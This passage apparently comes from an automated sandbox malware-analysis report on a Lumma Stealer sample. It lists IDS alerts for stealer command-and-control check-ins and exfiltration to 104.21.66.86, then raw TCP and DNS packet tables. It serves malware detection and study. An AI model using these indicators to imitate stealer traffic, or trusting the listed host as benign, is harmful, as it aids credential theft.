                                                                                                                                                                                                                                        2024-12-18T15:17:45.454383+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649724104.21.66.86443TCP
                                                                                                                                                                                                                                        2024-12-18T15:17:46.797919+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649739104.21.66.86443TCP
                                                                                                                                                                                                                                        2024-12-18T15:17:47.991015+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.649739104.21.66.86443TCP
                                                                                                                                                                                                                                        2024-12-18T15:17:47.991015+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649739104.21.66.86443TCP
                                                                                                                                                                                                                                        2024-12-18T15:17:49.546406+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649747104.21.66.86443TCP
                                                                                                                                                                                                                                        2024-12-18T15:17:54.184493+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.649747104.21.66.86443TCP
                                                                                                                                                                                                                                        2024-12-18T15:17:55.562519+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649761104.21.66.86443TCP
                                                                                                                                                                                                                                        2024-12-18T15:18:00.002374+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649771104.21.66.86443TCP
                                                                                                                                                                                                                                        2024-12-18T15:18:04.470967+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649782104.21.66.86443TCP
                                                                                                                                                                                                                                        2024-12-18T15:18:07.954372+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649790104.21.66.86443TCP
                                                                                                                                                                                                                                        2024-12-18T15:18:15.647919+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649817104.21.66.86443TCP

                                                                                                                                                                                                                                        Network Port Distribution

                                                                                                                                                                                                                                        TCP Packets

                                                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:38.135550976 CET49715443192.168.2.623.55.153.106
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:38.135602951 CET4434971523.55.153.106192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:38.135670900 CET49715443192.168.2.623.55.153.106
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:38.387649059 CET49715443192.168.2.623.55.153.106
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:38.387691021 CET4434971523.55.153.106192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:39.784202099 CET4434971523.55.153.106192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:39.784287930 CET49715443192.168.2.623.55.153.106
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:39.787102938 CET49715443192.168.2.623.55.153.106
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:39.787127972 CET4434971523.55.153.106192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:39.787436962 CET4434971523.55.153.106192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:39.835177898 CET49715443192.168.2.623.55.153.106
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:40.572591066 CET49715443192.168.2.623.55.153.106
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:40.615375042 CET4434971523.55.153.106192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:41.246870041 CET4434971523.55.153.106192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:41.246897936 CET4434971523.55.153.106192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:41.246948957 CET49715443192.168.2.623.55.153.106
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:41.246972084 CET4434971523.55.153.106192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:41.247020960 CET4434971523.55.153.106192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:41.247067928 CET4434971523.55.153.106192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:41.247083902 CET4434971523.55.153.106192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:41.247095108 CET49715443192.168.2.623.55.153.106
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:41.247095108 CET49715443192.168.2.623.55.153.106
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:41.247095108 CET49715443192.168.2.623.55.153.106
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:41.247112989 CET49715443192.168.2.623.55.153.106
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:41.247129917 CET49715443192.168.2.623.55.153.106
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:41.415951967 CET4434971523.55.153.106192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:41.416030884 CET4434971523.55.153.106192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:41.416064978 CET49715443192.168.2.623.55.153.106
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:41.416141033 CET4434971523.55.153.106192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:41.416198969 CET49715443192.168.2.623.55.153.106
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:41.446129084 CET4434971523.55.153.106192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:41.446187019 CET4434971523.55.153.106192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:41.446206093 CET49715443192.168.2.623.55.153.106
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:41.446208954 CET4434971523.55.153.106192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:41.446284056 CET49715443192.168.2.623.55.153.106
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:41.591547012 CET49715443192.168.2.623.55.153.106
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:41.591567993 CET4434971523.55.153.106192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:41.591584921 CET49715443192.168.2.623.55.153.106
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:41.591593027 CET4434971523.55.153.106192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:41.890295982 CET49724443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:41.890311003 CET44349724104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:41.890418053 CET49724443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:41.890937090 CET49724443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:41.890954018 CET44349724104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:43.119225979 CET44349724104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:43.119364977 CET49724443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:43.158876896 CET49724443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:43.158900023 CET44349724104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:43.159873009 CET44349724104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:43.173649073 CET49724443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:43.173674107 CET49724443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:43.173841000 CET44349724104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:45.454425097 CET44349724104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:45.454546928 CET44349724104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:45.454664946 CET49724443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:45.454740047 CET49724443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:45.454760075 CET44349724104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:45.454773903 CET49724443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:45.454787970 CET44349724104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:45.583229065 CET49739443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:45.583265066 CET44349739104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:45.583636045 CET49739443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:45.584111929 CET49739443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:45.584122896 CET44349739104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:46.797827005 CET44349739104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:46.797919035 CET49739443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:46.806118965 CET49739443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:46.806139946 CET44349739104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:46.806420088 CET44349739104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:46.815669060 CET49739443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:46.815712929 CET49739443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:46.815773010 CET44349739104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:47.991031885 CET44349739104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:47.991077900 CET44349739104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:47.991112947 CET44349739104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:47.991138935 CET44349739104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:47.991167068 CET44349739104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:47.991170883 CET49739443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:47.991187096 CET44349739104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:47.991213083 CET49739443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:47.991219044 CET44349739104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:47.991229057 CET49739443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:47.991235971 CET44349739104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:47.991276026 CET49739443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:47.999403954 CET44349739104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:48.007930040 CET44349739104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:48.008044004 CET49739443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:48.008050919 CET44349739104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:48.110945940 CET44349739104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:48.111054897 CET49739443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:48.111068010 CET44349739104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:48.163393974 CET49739443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:48.209464073 CET44349739104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:48.211812973 CET44349739104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:48.211896896 CET49739443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:48.211905956 CET44349739104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:48.211936951 CET44349739104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:48.211986065 CET49739443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:48.212033987 CET44349739104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:48.212184906 CET44349739104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:48.212213993 CET49739443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:48.212241888 CET44349739104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:48.212254047 CET49739443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:48.212261915 CET44349739104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:48.212270975 CET49739443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:48.212274075 CET44349739104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:48.317536116 CET49747443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:48.317589998 CET44349747104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:48.317699909 CET49747443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:48.318015099 CET49747443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:48.318026066 CET44349747104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:49.546305895 CET44349747104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:49.546406031 CET49747443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:49.619651079 CET49747443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:49.619673014 CET44349747104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:49.620722055 CET44349747104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:49.643990993 CET49747443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:49.644188881 CET49747443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:49.644237041 CET44349747104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:54.184470892 CET44349747104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:54.184570074 CET44349747104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:54.184751034 CET49747443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:54.184798956 CET49747443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:54.346293926 CET49761443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:54.346348047 CET44349761104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:54.346441984 CET49761443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:54.346798897 CET49761443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:54.346817017 CET44349761104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:55.562443018 CET44349761104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:55.562519073 CET49761443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:55.563998938 CET49761443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:55.564011097 CET44349761104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:55.564368010 CET44349761104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:55.565639019 CET49761443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:55.565771103 CET49761443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:55.565803051 CET44349761104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:55.565866947 CET49761443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:55.565874100 CET44349761104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:58.572990894 CET44349761104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:58.573081017 CET44349761104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:58.573131084 CET49761443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:58.573323965 CET49761443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:58.573343039 CET44349761104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:58.783680916 CET49771443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:58.783720970 CET44349771104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:58.783876896 CET49771443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:58.784284115 CET49771443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:58.784296036 CET44349771104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:00.002285004 CET44349771104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:00.002373934 CET49771443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:00.004319906 CET49771443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:00.004332066 CET44349771104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:00.004575968 CET44349771104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:00.006306887 CET49771443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:00.006541967 CET49771443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:00.006586075 CET44349771104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:00.006649017 CET49771443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:00.006659031 CET44349771104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:01.958435059 CET44349771104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:01.958559990 CET44349771104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:01.958707094 CET49771443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:01.958889961 CET49771443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:03.252577066 CET49782443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:03.252607107 CET44349782104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:03.252712011 CET49782443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:03.253081083 CET49782443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:03.253089905 CET44349782104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:04.470695972 CET44349782104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:04.470967054 CET49782443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:04.472646952 CET49782443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:04.472662926 CET44349782104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:04.472918987 CET44349782104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:04.474560022 CET49782443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:04.474560022 CET49782443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:04.474592924 CET44349782104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:05.640451908 CET44349782104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:05.640563965 CET44349782104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:05.640615940 CET49782443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:05.645277023 CET49782443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:05.645292044 CET44349782104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:06.638206005 CET49790443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:06.638262987 CET44349790104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:06.638521910 CET49790443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:06.638844967 CET49790443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:06.638859034 CET44349790104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:07.954288960 CET44349790104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:07.954371929 CET49790443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:07.994103909 CET49790443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:07.994127989 CET44349790104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:07.994455099 CET44349790104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:07.995863914 CET49790443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:07.996752977 CET49790443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:07.996788025 CET44349790104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:07.997041941 CET49790443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:07.997077942 CET44349790104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:07.997697115 CET49790443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:07.997746944 CET44349790104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:07.998740911 CET49790443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:07.998780966 CET44349790104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:07.998969078 CET49790443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:07.999007940 CET44349790104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:07.999150991 CET49790443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:07.999180079 CET44349790104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:07.999197006 CET49790443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:07.999214888 CET44349790104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:07.999360085 CET49790443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:07.999394894 CET44349790104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:07.999408960 CET49790443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:07.999533892 CET49790443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:07.999562025 CET49790443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:08.047331095 CET44349790104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:08.047530890 CET49790443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:08.047569036 CET44349790104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:08.047595024 CET49790443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:08.047620058 CET44349790104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:08.047676086 CET49790443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:08.047703981 CET44349790104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:08.047715902 CET49790443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:08.047719955 CET44349790104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:14.513245106 CET44349790104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:14.513339043 CET44349790104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:14.513391972 CET49790443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:14.513537884 CET49790443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:14.513550997 CET44349790104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:14.555057049 CET49817443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:14.555105925 CET44349817104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:14.555187941 CET49817443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:14.555572033 CET49817443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:14.555589914 CET44349817104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:15.647918940 CET49817443192.168.2.6104.21.66.86

                                                                                                                                                                                                                                        UDP Packets

                                                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:35.709139109 CET6376953192.168.2.61.1.1.1
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:35.928087950 CET53637691.1.1.1192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:36.052126884 CET5505653192.168.2.61.1.1.1
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:36.191143990 CET53550561.1.1.1192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:36.192610979 CET5708353192.168.2.61.1.1.1
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:36.413052082 CET53570831.1.1.1192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:36.424196959 CET5789853192.168.2.61.1.1.1
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:36.645276070 CET53578981.1.1.1192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:36.738534927 CET5777953192.168.2.61.1.1.1
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:36.878353119 CET53577791.1.1.1192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:36.962635994 CET6226453192.168.2.61.1.1.1
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:37.100126028 CET53622641.1.1.1192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:37.383090019 CET5580753192.168.2.61.1.1.1
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:37.609543085 CET53558071.1.1.1192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:37.613349915 CET6132853192.168.2.61.1.1.1
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:37.751405001 CET53613281.1.1.1192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:37.754473925 CET6481853192.168.2.61.1.1.1
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:37.984594107 CET53648181.1.1.1192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:37.987747908 CET5388153192.168.2.61.1.1.1
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:38.125514030 CET53538811.1.1.1192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:41.666347027 CET4995553192.168.2.61.1.1.1
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:41.888818979 CET53499551.1.1.1192.168.2.6

                                                                                                                                                                                                                                        DNS Queries

                                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
